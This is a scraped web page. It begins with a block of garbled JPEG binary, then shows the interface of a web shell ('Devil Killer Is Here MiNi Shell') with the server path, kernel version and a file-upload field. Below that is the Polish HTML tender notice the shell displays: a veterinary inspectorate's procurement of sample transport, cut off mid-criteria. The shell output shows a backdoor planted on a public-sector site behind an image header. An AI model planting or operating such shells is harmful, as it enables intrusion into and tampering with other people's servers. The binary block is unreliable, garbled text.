JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221205/0047634601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewóz prób do badań laboratoryjnych na 2023 rok </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI INSPEKTORAT WETERYNARII</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000093177</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Botaniczna 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zielona Góra</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">65-306</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zgora.wiw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wet.zgora.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność administracji publicznej w zakresie bezpieczeństwa żywności, pasz, utylizacji, nadzoru farmaceutycznego, bezpieczeństwa i ochrony zdrowia zwierząt oraz w zakresie wykonywania badań lab. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewóz prób do badań laboratoryjnych na 2023 rok </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8f48ab15-7239-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00476346</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00032141/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przewóz prób do badań laboratoryjnych w 2023 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8f48ab15-7239-11ed-abdb-a69c1593877c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zgora.wiw.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu:<br/>a) e-Zamówienia, https://ezamowienia.gov.pl/pl/<br/>b) ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz<br/>c) poczty elektronicznej.<br/>2) Osoby wskazane do porozumiewania się z Wykonawcami:<br/>Joanna Kułakowska, email: zamowieniapubliczne@wet.zgora.pl <br/>Dagmara Laska, email: zamowieniapubliczne@wet.zgora.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIW.DG.272.12.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> usługa odbioru prób do badań laboratoryjnych z następujących punktów: PIW Nowa Sól, PIW Żagań, PIW Żary z siedzibą w Lubsku, PIW Wschowa, PIW Krosno Odrzańskie i dostarczenie ich bezpośrednio do Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze - Zakładu Higieny Weterynaryjnej, Pracowni Badań Serologicznych, ul. Browarna 6, 65- 849 Zielona Góra. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji. Przedmiot zamówienia określa zakres:<br/>- podstawowy: 29 952 km<br/>- opcjonalny: 7 488 km<br/>Łącznie: 37 440 km<br/>Maksymalna wartość opcji 28 454,40 zł brutto <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w<br/>kryteriów:<br/>a) Cena oferty brutto – K1<br/>b) Rok produkcji pojazdu przewidzianego do świadczenia usługi – K2<br/>c) Maksymalny czas podstawienia zastępczego środka przewozu– K3<br/>2) Powyższym kryteriom Zamawiający przypisał następujące znaczenia oraz sposób oceny:<br/>metoda punktowa wg wzoru<br/>K1- Cena brutto oferty 60%<br/>K1 = cena najniższa ze wszystkich ofert/cena oferty badanejx100pkt x60%<br/>K2 – Rok produkcji pojazdu przewidzianego do świadczenia usługi 30 % 30,00 K2= suma punktów otrzymanych za rok produkcji<br/>środka transportu (zgodnie z wykazem poniżej)/ liczba pojazdów (sztuk)<br/>K2 - Wykonawca otrzyma następującą liczbę punktów za rok produkcji środka przewozu:<br/>• 2011 i niżej otrzyma 0 pkt<br/>• 2012 otrzyma 5 pkt<br/>• 2013 otrzyma 10 pkt<br/>• 2014 do 2015 otrzyma 15 pkt<br/>• 2016 do 2017 otrzyma 20 pkt<br/>• 2018 do 2019 otrzyma 25 pkt<br/>• 2020 i nowsze otrzyma 30 pkt<br/>Niewskazanie roku produkcji środka przewozu przez Wykonawcę w formularzu ofertowym skutkuje odrzuceniem oferty na podstawie<br/>art. 226 ust. 1 pkt. 5 ustawy Pzp jako niezgodnej z warunkami zamówienia.<br/>Uwaga: Zamawiający zastrzega, że brak jest możliwości samowolnej zmiany pojazdu. Wskazane pojazdy do realizacji zamówienia<br/>będą musiały być wykorzystywane przez Wykonawcę. Zmiana środka przewozu w trakcie trwania usługi może nastąpić w przypadku<br/>sprzedaży pojazdu, uszkodzenia lub długotrwałej niesprawności. Zamawiający dopuszcza wykazanie się pojazdem podmiotu<br/>trzeciego.<br/>K3 – Maksymalny czas podstawienia zastępczego środka przewozu 10 %<br/>K3- Wykonawca otrzyma następującą liczbę punktów za czas podstawienia zastępczego środka przewozu liczony od momentu<br/>wystąpienia awarii i powiadomienia przedstawiciela Zamawiającego:<br/>• Do 4,0 godzin otrzyma 0 pkt<br/>• Do 3,0 godzin otrzyma 5 pkt<br/>• Do 2,0 godzin otrzyma 10 pkt<br/>Czas podstawienia zastępczego środka przewozu należy podać w pełnych godzinach. Jeżeli Wykonawca poda czas reakcji w<br/>minutach Zamawiający dokona przeliczenia na godziny i zaokrągli do pełnych godzin (w górę) (np. 210 min/60 min = 3,5 h, co daje<br/>rozpoczętą godzinę i wynosi 4,0h). Przy<br/>zaoferowaniu terminu dłuższego niż 4,0 h, bądź niewpisania czasu podstawienia środka zastępczego skutkuje odrzuceniem oferty<br/>na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>RAZEM 100%<br/>3) Całkowita liczba punktów jaką otrzyma oferta zostanie obliczona wg poniższego wzoru: K=K1 + K2+K3, gdzie:<br/>K – całkowita liczba punktów<br/>K1 – punkty uzyskane w kryterium „cena brutto oferty”<br/>K2 – punkty uzyskane w kryterium „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>K3 – punkty uzyskane w kategorii „maksymalny czas podstawienia zastępczego środka przewozu”<br/>4) Ocena punktowa w kryterium<br/>K1 – „cena brutto oferty” zostanie dokonana na podstawie łącznej<br/>ceny ofertowej brutto wskazanej przez Wykonawcę w formularzu ofertowym, przeliczona zostanie według wzoru opisanego w tabeli<br/>powyżej.<br/>5) Ocena punktowa w kryterium<br/>K2 – „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli.<br/>6) Ocena punktowa w kryterium<br/>K3 – „maksymalny czas podstawienia zastępczego środka przewozu”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu przewidzianego do świadczenia usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">maksymalny czas podstawienia zastępczego środka przewozu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach zadania nr 2, Wykonawca zobowiązuje się do odbioru prób z:<br/>1) Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze - Zakładu Higieny Weterynaryjnej w Gorzowie Wlkp., ul. Bohaterów Warszawy 4, 66-400 Gorzów Wielkopolski, zwane dalej „ZHW&#34; Gorzów Wlkp.”;<br/>2) Powiatowego Inspektoratu Weterynarii w Międzyrzeczu, ul. Zakaszewskiego 2, 66-300 Międzyrzecz, zwane dalej „PIW Międzyrzecz”;<br/>3) Powiatowego Inspektoratu Weterynarii w Sulęcinie, ul. Lipowa 27, 69-200 Sulęcin, zwane dalej „PIW Sulęcin”;<br/>4) Powiatowego Inspektoratu Weterynarii w Świebodzinie, ul. Zachodnia 58, 66-200 Świebodzin, zwane dalej „PIW Świebodzin”<br/>i dostarczania ich bezpośrednio do Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze - Zakładu Higieny Weterynaryjnej, Pracowni Badań Serologicznych, ul. Browarna 6, 65- 849 Zielona Góra. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji. Przedmiot zamówienia określa zakres:<br/>- podstawowy: 43 200 km<br/>- opcjonalny: 3 600 km<br/>Łącznie: 46 800 km <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w<br/>kryteriów:<br/>a) Cena oferty brutto – K1<br/>b) Rok produkcji pojazdu przewidzianego do świadczenia usługi – K2<br/>c) Maksymalny czas podstawienia zastępczego środka przewozu– K3<br/>2) Powyższym kryteriom Zamawiający przypisał następujące znaczenia oraz sposób oceny:<br/>metoda punktowa wg wzoru<br/>K1- Cena brutto oferty 60%<br/>K1 = cena najniższa ze wszystkich ofert/cena oferty badanejx100pkt x60%<br/>K2 – Rok produkcji pojazdu przewidzianego do świadczenia usługi 30 % 30,00 K2= suma punktów otrzymanych za rok produkcji<br/>środka transportu (zgodnie z wykazem poniżej)/ liczba pojazdów (sztuk)<br/>K2 - Wykonawca otrzyma następującą liczbę punktów za rok produkcji środka przewozu:<br/>• 2011 i niżej otrzyma 0 pkt<br/>• 2012 otrzyma 5 pkt<br/>• 2013 otrzyma 10 pkt<br/>• 2014 do 2015 otrzyma 15 pkt<br/>• 2016 do 2017 otrzyma 20 pkt<br/>• 2018 do 2019 otrzyma 25 pkt<br/>• 2020 i nowsze otrzyma 30 pkt<br/>Niewskazanie roku produkcji środka przewozu przez Wykonawcę w formularzu ofertowym skutkuje odrzuceniem oferty na podstawie<br/>art. 226 ust. 1 pkt. 5 ustawy Pzp jako niezgodnej z warunkami zamówienia.<br/>Uwaga: Zamawiający zastrzega, że brak jest możliwości samowolnej zmiany pojazdu. Wskazane pojazdy do realizacji zamówienia<br/>będą musiały być wykorzystywane przez Wykonawcę. Zmiana środka przewozu w trakcie trwania usługi może nastąpić w przypadku<br/>sprzedaży pojazdu, uszkodzenia lub długotrwałej niesprawności. Zamawiający dopuszcza wykazanie się pojazdem podmiotu<br/>trzeciego.<br/>K3 – Maksymalny czas podstawienia zastępczego środka przewozu 10 %<br/>K3- Wykonawca otrzyma następującą liczbę punktów za czas podstawienia zastępczego środka przewozu liczony od momentu<br/>wystąpienia awarii i powiadomienia przedstawiciela Zamawiającego:<br/>• Do 4,0 godzin otrzyma 0 pkt<br/>• Do 3,0 godzin otrzyma 5 pkt<br/>• Do 2,0 godzin otrzyma 10 pkt<br/>Czas podstawienia zastępczego środka przewozu należy podać w pełnych godzinach. Jeżeli Wykonawca poda czas reakcji w<br/>minutach Zamawiający dokona przeliczenia na godziny i zaokrągli do pełnych godzin (w górę) (np. 210 min/60 min = 3,5 h, co daje<br/>rozpoczętą godzinę i wynosi 4,0h). Przy<br/>zaoferowaniu terminu dłuższego niż 4,0 h, bądź niewpisania czasu podstawienia środka zastępczego skutkuje odrzuceniem oferty<br/>na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp, jako niezgodnej z warunkami zamówienia.<br/>RAZEM 100%<br/>3) Całkowita liczba punktów jaką otrzyma oferta zostanie obliczona wg poniższego wzoru: K=K1 + K2+K3, gdzie:<br/>K – całkowita liczba punktów<br/>K1 – punkty uzyskane w kryterium „cena brutto oferty”<br/>K2 – punkty uzyskane w kryterium „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>K3 – punkty uzyskane w kategorii „maksymalny czas podstawienia zastępczego środka przewozu”<br/>4) Ocena punktowa w kryterium<br/>K1 – „cena brutto oferty” zostanie dokonana na podstawie łącznej<br/>ceny ofertowej brutto wskazanej przez Wykonawcę w formularzu ofertowym, przeliczona zostanie według wzoru opisanego w tabeli<br/>powyżej.<br/>5) Ocena punktowa w kryterium<br/>K2 – „rok produkcji pojazdu przewidzianego do świadczenia usługi”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli.<br/>6) Ocena punktowa w kryterium<br/>K3 – „maksymalny czas podstawienia zastępczego środka przewozu”<br/>zostanie dokonana według zasad opisanych w powyższej tabeli</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu przewidzianego do świadczenia usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">maksymalny czas podstawienia zastępczego środka przewozu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> usługa odbioru prób do badań laboratoryjnych z Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze - Zakładu Higieny Weterynaryjnej, Pracowni Badań Serologicznych, ul. Browarna 6, 65- 849 Zielona Góra i dostarczenie do następujących punktów: ZHW Poznań, ZHW Leszno, ZHW Wrocław, ZHW Zduńska Wola, PIWet Puławy oraz Wojewódzkiego Inspektoratu Weterynarii w Zielonej Górze - Zakładu Higieny Weterynaryjnej w Gorzowie Wlkp, ul. Bohaterów Warszawy 4, 66-400 Gorzów Wielkopolski. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60000000-8 - Usługi transportowe (z wyłączeniem transportu odpadów)</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji. Przedmiot zamówienia określa zakres:<br/>- podstawowy: 54096km<br/>- opcjonalny: 16320 km<br/>Łącznie: 70416 km <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w<br/>kryteriów:<br/>a) Cena oferty brutto – K1<br/>b) Rok produkcji pojazdu przewidzianego do świadczenia usługi – K2<br/>c) Maksymalny czas podstawienia zastępczego środka przewozu– K3<br/>2) Powyższym kryteriom Zamawiający przypisał następujące znaczenia oraz sposób oceny:<br/>metoda punktowa wg wzoru<br/>K1- Cena brutto oferty 